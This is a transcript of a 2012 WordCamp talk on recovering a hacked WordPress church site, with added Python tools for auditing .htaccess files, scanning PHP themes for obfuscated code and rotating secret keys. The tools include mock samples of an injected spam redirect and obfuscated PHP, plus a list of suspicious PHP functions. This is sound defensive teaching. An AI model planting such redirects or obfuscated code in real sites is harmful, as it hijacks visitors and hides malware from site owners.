google says you shouldn’t visit my church wcgr


Post on 29-Jan-2015

DESCRIPTION

Justin Jones speaking about WordPress website security at WordCamp Grand Rapids, August 18, 2012

TRANSCRIPT

Page 1: Google says you shouldn’t visit my church wcgr

Google Says You Shouldn’t Visit My Church

A Tale of How My Site Got Hacked, Why It Was My Fault, and What I Did To Fix It

Justin Jones • Fort Wayne, IN @jjonesftw

Page 2

I’m Justin Jones

- Teacher
- Church Worker
- WordPress hobbyist
- Podcast cohost at “The Weekly Theme Show” http://wpcandy.com
- @jjonesftw
- justinjones.net

Page 3

Why would someone want to hack my site?

- The world doesn’t revolve around you
  - Crime of opportunity
  - Don’t leave your front door unlocked

Page 4

Why would someone want to hack my site?

- Imperva selected 50 sites at random, July 2012:
  - Expect attack incidents 120 days per year (33% of the time); some can experience 292 days (80%)
  - Attacked 274 times per year
  - Attack campaigns average 7 minutes 42 seconds and can range upward from there
  - SQL Injection is the most frequent attack

Page 5

Why would someone want to hack my site?

- “Black Hat” SEO
  - Hidden links, footer credit links, back links, etc…
- To make money directly
  - Affiliate sales
  - Rogue virus scanners

Page 6

Why would someone want to hack my site?

- Serve up images and content for SPAM email

Page 8

What do they do while they’re poking around my site?

- Alter robots.txt, .htaccess
  - Some are specific to “robots” or HTTP Referrer
- Create backdoors in unsuspecting .php files
- Add their own .php files and images to serve up their payload content
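
An added example, not part of the original slides: a small auditor for the .htaccess tampering listed above, where injected rewrite rules fire only for crawler User-Agents or for visitors arriving from a search engine. The sample file, the placeholder hostnames and the function name `audit_htaccess` are constructed for illustration.

```python
import re

# RewriteCond lines that test who is asking (crawler UA or referring site).
COND = re.compile(r"^\s*RewriteCond\s+%\{(HTTP_USER_AGENT|HTTP_REFERER)\}\s+\S+", re.I)
RULE = re.compile(r"^\s*RewriteRule\s+(\S+)\s+(\S+)", re.I)
ABSOLUTE = re.compile(r"^https?://([^/:]+)", re.I)


def audit_htaccess(text, own_host):
    """Flag RewriteRules that only fire for certain User-Agents or Referers.

    own_host is the site's own hostname; a redirect to any other host is
    marked off_site. Returns a list of dicts, one per flagged rule.
    """
    findings = []
    pending = []  # RewriteCond lines apply to the next RewriteRule only
    for lineno, line in enumerate(text.splitlines(), 1):
        cond = COND.match(line)
        if cond:
            pending.append(cond.group(1).upper())
            continue
        rule = RULE.match(line)
        if not rule:
            continue
        if pending:
            host = ABSOLUTE.match(rule.group(2))
            findings.append({
                "line": lineno,
                "keyed_on": sorted(set(pending)),
                "target": rule.group(2),
                "off_site": bool(host) and host.group(1).lower() != own_host.lower(),
            })
        pending = []
    return findings


# Constructed sample: the stock WordPress permalink block followed by an
# injected conditional redirect. Hostnames are placeholders.
SAMPLE = r"""# BEGIN WordPress
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
# END WordPress
RewriteCond %{HTTP_REFERER} (google|bing|yahoo) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (googlebot|bingbot) [NC]
RewriteRule ^(.*)$ http://spam.example/landing [R=302,L]
"""

if __name__ == "__main__":
    for finding in audit_htaccess(SAMPLE, "church.example"):
        print(finding)
```

A flagged rule is a prompt to compare the file with a known-good copy, not proof of compromise: some legitimate rules also key on User-Agent.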

Page 9

What do they do while they’re poking around my site?

- Inject code into theme files, like header.php
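
An added example, not part of the original slides: a heuristic scanner for injected theme code such as the header.php case above. It flags PHP function names spelled out of concatenated single-quoted fragments, concatenated base64 strings that decode to readable text, and calls routed through a `$GLOBALS` lookup table. The samples and all function names are constructed here.

```python
import base64
import os
import re

# PHP functions that honest theme code has no reason to spell in pieces.
SENSITIVE = {"base64_decode", "gzuncompress", "gzinflate", "str_rot13", "eval",
             "unserialize", "file_get_contents", "fopen", "fwrite"}
# Two or more single-quoted literals glued together with PHP's "." operator.
CONCAT = re.compile(r"'[^'\\]*'(?:\s*\.\s*'[^'\\]*')+")
LITERAL = re.compile(r"'([^'\\]*)'")
# A call made through a lookup table: $GLOBALS['name'][3](...)
INDIRECT = re.compile(r"\$GLOBALS\s*\[\s*'[^']+'\s*\]\s*\[\s*\d+\s*\]\s*\(")


def hidden_text(joined):
    """Return decoded text if joined is base64 for printable ASCII, else None."""
    if len(joined) < 8 or len(joined) % 4:
        return None
    try:
        raw = base64.b64decode(joined, validate=True)
    except ValueError:
        return None
    if all(32 <= b < 127 for b in raw):
        return raw.decode("ascii")
    return None


def scan_php(source):
    """Return (indicator, detail) tuples for one file's contents."""
    findings = []
    for match in CONCAT.finditer(source):
        joined = "".join(LITERAL.findall(match.group(0)))
        if joined.lower() in SENSITIVE:
            findings.append(("split-function-name", joined))
        elif hidden_text(joined) is not None:
            findings.append(("split-base64-string", hidden_text(joined)))
    if INDIRECT.search(source):
        findings.append(("indirect-call-table", "$GLOBALS[...][n](...)"))
    return findings


def scan_tree(root):
    """Scan every .php file under root; return {path: findings} for hits only."""
    hits = {}
    for folder, _dirs, files in os.walk(root):
        for name in files:
            if name.endswith(".php"):
                path = os.path.join(folder, name)
                with open(path, encoding="utf-8", errors="replace") as handle:
                    found = scan_php(handle.read())
                if found:
                    hits[path] = found
    return hits


# Constructed samples, not taken from any real site.
CLEAN = ("<?php wp_head(); ?>\n<title><?php echo get_bloginfo('name')"
         " . ' | ' . get_bloginfo('description'); ?></title>\n")
INFECTED = r"""<?php
$GLOBALS['_t_']=Array('base' .'64_deco' .'de','file_ge' .'t_contents');
function _k($i){$a=Array('ZXhh' .'bXBs' .'ZQ==','c2Ft' .'cGxl');return base64_decode($a[$i]);}
echo $GLOBALS['_t_'][1](_k(0));
?>
""" + CLEAN
```

Point `scan_tree` at `wp-content/themes` and treat hits as files to diff against a fresh copy of the theme; a clean result does not rule out other obfuscation styles.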

Page 11

How Do They Get In?

- Outdated versions of WordPress
- Outdated themes and plugins
- Hosting providers behind the times
- Insecure password / brute force
- Compromised computer
  - Passwords cached in FTP clients, passwords stored in an unencrypted text file, etc…
- Unsecured internet connection
  - Rogue access points
  - Packet sniffers on public WiFi

Page 12

What are the consequences?

- Google will punish you.
  - Google Safe Browsing or manual removal action

Page 17

What are the consequences?

- Other “blacklisting” like Norton Safe Web, Phish Tank, Opera, Sucuri, and many others
- Spammy content will get indexed with every search engine
  - Don’t forget about directory listing sites, like Google Places / Google Maps
- Your host may dump you for violating TOS

Page 18

What are the consequences?

- Be a good neighbor! Security is everyone’s responsibility

Page 19

What are the consequences?

- Malware cost the US economy 2.2 billion dollars in lost productivity in 2011
- Are you an ecommerce site?
  - Payment gateway is probably offsite, but what about people’s email addresses?
- Membership site?
  - Many people re-use passwords
  - LinkedIn, Last.fm, many others recently
- Business or organization?
  - How much street cred will you earn serving content from exotic-dildos.co.cc

Page 20

Is WordPress insecure?

- No.
- The Pharma hack had a patch out before it was exploited
- WordPress has a target on its back
  - WordPress is used by over 14.7% of Alexa Internet's "top 1 million" websites and as of August 2011 manages 22% of all new websites.
- Some theme and plugin authors are lazy/sloppy, or use deprecated/inefficient methods
- You are your own worst enemy!
  - Think about Windows XP back in like 2002

Page 21

Is WordPress insecure?

- Be careful who you trust
  - Everyone is a “developer” now
  - NEVER download and install a theme for free that you should have paid for
    - Shady scraper sites, torrents, etc…
  - “Having a website *should* cost you more than $300 a year. If it doesn’t, then you’re doing it wrong.” --Otto

Page 22

Is WordPress insecure?

- Be careful who you trust
  - Be very wary of downloading a free theme outside of the WordPress.org theme repo
    - Use “Theme Authenticity Checker” and “Theme Check”
    - Siobhan McKeown at WPMU.org Google’d “free wordpress themes”
      - Top 10 results: 1=wordpress.org; 1=poorly coded; 8=actively using encrypted code to insert spammy links
  - Use trusted theme marketplaces or commercial shops

Page 23

Is WordPress insecure?

- Be careful who you trust
  - Choose plugins carefully
    - Trusted commercial plugin shops
    - WordPress.org directory
  - More plugins != insecure
  - Check user ratings
  - Support forum requests
  - Check community blogs
  - WordPress.org profile pages for favorites and others by same author

Page 28

Prepare for Disaster

- It’s going to happen
- Maintain regular backups
  - Server side or Plugins
- Be registered with Google Webmaster Tools
- Know how to contact your hosting provider
- Know a developer
- Visit your site
- Watch your stats

Page 29

Update. Update. Update.

- Source: http://churchm.ag/wordpress-updates/

Page 30

Update. Update. Update.

- August 2011, so 3.2.1 was most current
- Less than half of the top 100k sites running WordPress were up to date!
- WordPress iterates quickly to patch security holes. Keep updated to benefit from their work
- Source: http://churchm.ag/wordpress-updates/

Page 31

Update. Update. Update.

- WordPress core, .org plugins and .org themes can use the core update functionality
- Some commercial themes and plugins have their own way of one-click upgrade, some are manual only
- Some have notifications, some don’t
- Sign up for WordPress.org release notifications from the download page

Page 32

Here’s Where This Gets Technical

- I’ll have these slides up on Slide Share
- I’ve reserved time at the end for questions, and I’ll be available after for individual questions

Page 33

It’s the week before Easter and your church site is serving up topless photos of celebrities. Now What?

- Take a deep breath and crack open a beer. You’ve got some work ahead of you.
- Get back control of your site
- Get the site offline if you can!

Page 34

It’s the week before Easter and your church site is serving up topless photos of celebrities. Now What?

- Change *every* single one of your passwords
  - Domain registrar, hosting account, all WordPress users, SQL database username and password, FTP account password
  - I suggest changing your email account passwords
- Hire a professional
  - Check out http://sucuri.net/
  - Many others out there, Google them up!

Page 35

It’s the week before Easter and your church site is serving up topless photos of celebrities. Now What?

- Regenerate WordPress secret keys / salts
  - Manually in wp-config.php or use a plugin

define('AUTH_KEY', 'n%foh;/v6$)0<t]=Be]o~2L?nopubK;b1-P(x=~dCyY[pL]^Ry//=I$y.w-8&HGP');
define('SECURE_AUTH_KEY', 'q#h,K.OZ=-IT)(-`3`)G1Kr-&ZP,!CEM1<sMx-1eDI<H*BfO2G@~ bD<)]8rW|{/');
define('LOGGED_IN_KEY', 'Vuvu|_`AGu@) >*7K~l]B1v-d3-e}<Qo#hki8Fy(Bov:T~wOm#8hqHZbWP2khxR}');
define('NONCE_KEY', 'B&8:S*:tZR700I9]3~sWI0Rv1+9e_O{KXcc+`a!eB-wV$+Cctv$q*Yb+c.5w<xns');
define('AUTH_SALT', 'bpx*[xMhU<FjufQ*``oc&NNdvz,-FJ=|~+$G:i9qaCFRY>u,-}%-Cc-G|!5r0|D@');
define('SECURE_AUTH_SALT', 'S+C/f6B6[Y+uGJt!@K|c:49tA}xB!5_zE6RZ+ AT.bsFNvD^-YGOI@HG8V:YbR?q');
define('LOGGED_IN_SALT', '~oP,M4HQ8 ,M$<A[(`HZ@>_BC,Yo/Y].kw+{g^KnLPzB[UAI_Z6h6M+KbZ|.|<$-');
define('NONCE_SALT', 'KW*LbM<2qL7LAZZ!vdto?c?!(5eSb)|o$BA;{F-CLZB=M%_QfbdW[@lSDT_]ImE[');
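
An added example, not part of the original slides: one way to do the manual regeneration offline. WordPress mixes these eight values into its login cookies, so replacing them logs out every existing session, including an intruder's. The sample config fragment and the function names are constructed here.

```python
import re
import secrets

KEY_NAMES = ("AUTH_KEY", "SECURE_AUTH_KEY", "LOGGED_IN_KEY", "NONCE_KEY",
             "AUTH_SALT", "SECURE_AUTH_SALT", "LOGGED_IN_SALT", "NONCE_SALT")

# Characters that need no escaping inside a PHP single-quoted string
# (no single quote, no backslash).
ALPHABET = ("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
            "!@#$%^&*()-_=+[]{}<>~|;:,.?/ ")


def new_secret(length=64):
    """One key or salt value drawn from the operating system's CSPRNG."""
    return "".join(secrets.choice(ALPHABET) for _ in range(length))


def rotate_keys(config_text):
    """Give every key/salt define() in wp-config.php text a fresh value.

    Returns (new_text, missing), where missing lists the names that had no
    define() line to replace, so the caller can add them by hand.
    """
    missing = []
    for name in KEY_NAMES:
        pattern = re.compile(
            r"define\(\s*'" + name + r"'\s*,\s*'(?:[^'\\]|\\.)*'\s*\)\s*;")
        fresh = "define('%s', '%s');" % (name, new_secret())
        # A function replacement keeps re.subn from interpreting the value.
        config_text, count = pattern.subn(lambda _m: fresh, config_text, count=1)
        if not count:
            missing.append(name)
    return config_text, missing


# Constructed wp-config.php fragment; NONCE_SALT is left out on purpose
# to show how a missing define() is reported.
SAMPLE_CONFIG = """<?php
define('DB_NAME', 'example_db');
define('AUTH_KEY',         'put your unique phrase here');
define('SECURE_AUTH_KEY',  'put your unique phrase here');
define('LOGGED_IN_KEY',    'put your unique phrase here');
define('NONCE_KEY',        'put your unique phrase here');
define('AUTH_SALT',        'put your unique phrase here');
define('SECURE_AUTH_SALT', 'put your unique phrase here');
define('LOGGED_IN_SALT',   'put your unique phrase here');
$table_prefix = 'wp_';
"""

if __name__ == "__main__":
    text, absent = rotate_keys(SAMPLE_CONFIG)
    print(text)
    print("no define() found for:", absent)
```

Rotate the keys only after the backdoors are gone and the passwords are changed, otherwise the intruder can simply log in again.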

Page 36

It’s the week before Easter and your church site is serving up topless photos of celebrities. Now What?

- Backup
- Restore from a previous backup
- Find and delete all the junk they added
  - Very insidious. Creating rogue sitemaps, modifying .htaccess files, creating backdoors, adding index.php files to override permalinks, etc…
  - Posts and images now in database
- Reinstall WordPress core, plugins and themes

Page 38

It’s the week before Easter and your church site is serving up topless photos of celebrities. Now What?

- Begin the process of restoring your good name
  - Request delisting of bogus content from Google and other search engines
    - Very tedious, manual process
  - Request reevaluation from blacklisting services
  - Don’t forget about other services that pull content from your site, like Google places
  - Wait it out. This will take weeks and months
- Prepare better for next time

Page 39

Harden Your Site. The Easy Stuff.

- Keep up to date! WordPress, plugins, themes – but also PHP version on your host
- Use strong passwords – no words! Not P@$$woRd either.
  - Consider using a password manager
- Remove “admin” user

Page 40

Harden Your Site. The Easy Stuff.

- Only connect using SFTP
- Never ever hack core WordPress files
- Keep a clean house!
  - Other WP installs, other PHP services, plugins, old themes
- Disable user registration

Page 41

Harden Your Site. The More Complicated Stuff.

- Store your wp-config file outside of public_html
  - Done at install or can be moved later
- Change the database prefix
- Use strong database passwords
- Use proper 755 file permissions
  - If a plugin or theme asks you to set 777, avoid.
- Only log in to site using SSL (https://...)

Page 42

Harden Your Site. The More Complicated Stuff.

- Plugins! Plugins! Plugins!
  - Monitor core / template files
    - “WordPress File Monitor Plus”
  - Scan template files for suspicious code
    - “AntiVirus”
  - WP and server security settings
    - “WebsiteDefender WordPress Security”
  - Keep up to date
    - “Update Notifications”

Page 43

Harden Your Site. The More Complicated Stuff.

- Plugins! Plugins! Plugins!
  - “WordPress Firewall 2”
  - “Block Bad Queries”
  - Backup
    - VaultPress
    - BackupBuddy
  - Login Lockdown
    - Lock out excessive retries and mask login errors
  - Many others available for two factor auth, etc…
  - Sucuri plugin has a firewall to block known bad IP’s

Page 44

Should you really be hosting your own site?

- Do you like to change your own oil in your car or take it to the Jiffy Lube?
- WordPress.com is a great resource for most personal bloggers. Focus on writing your content.
- Consider a WordPress managed host.
  - WP Engine, ZippyKid, Pagely, etc…
- Don’t be afraid to pay someone!
  - How important is this project?
  - What is your time worth?

Page 45

Resources

- Codepoet.com
  - eBook “Locking Down WordPress”

Page 46

Resources

- These slides on Slide Share
- Search for slides from Dre Armeda and Brad Williams
- WordPress.org Codex
- Otto on WordPress
- Sucuri.net – service and blog
- Lockdown WordPress – A Security Webinar with Dre Armeda
  - 1.5 hour interview – great resource!
- Countless plugins on the WordPress.org repo
- http://sitecheck.sucuri.net/scanner/

Page 47

Questions?

- No question is stupid. We’re all here to learn!
- If you’re smarter than I am, please jump in here.